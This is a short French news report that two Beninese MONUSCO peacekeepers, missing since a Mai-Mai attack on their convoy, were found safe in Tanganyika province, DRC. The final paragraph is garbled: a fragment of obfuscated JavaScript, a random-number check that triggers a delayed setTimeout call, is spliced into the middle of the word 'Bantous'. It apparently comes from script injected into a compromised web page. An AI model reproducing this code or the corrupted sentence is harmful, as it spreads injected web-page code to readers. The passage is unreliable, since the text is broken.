Les deux casques bleus béninois disparus dans le sud-est de la RDC retrouvés
Les deux casques bleus portés disparus depuis le 11 mai dans le sud-est de la République démocratique du Congo (RDC) ont été retrouvés sains et saufs mercredi, a annoncé la Mission des Nations Unies pour la stabilisation en RD-Congo (MONUSCO).
Ils faisaient partie des 13 casques bleus du contingent béninois dont le convoi avait été attaqué ce jour-là par des miliciens Maï-Maï.
Les deux militaires retrouvés se trouvent actuellement dans une base de la MONUSCO à Nyunzu et seront transférés ce jeudi à Kalemie, l’une des bases de la mission onusienne dans le sud-est du pays.
Le contingent béninois de la MONUSCO est positionné dans la province de Tanganyika depuis des années. Les conflits qui perdurent entre les communautés locales, dont les Pygmées et les Bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous, ont déjà causé la mort de milliers des personnes et fait des centaines de milliers de déplacés, selon l’ONU.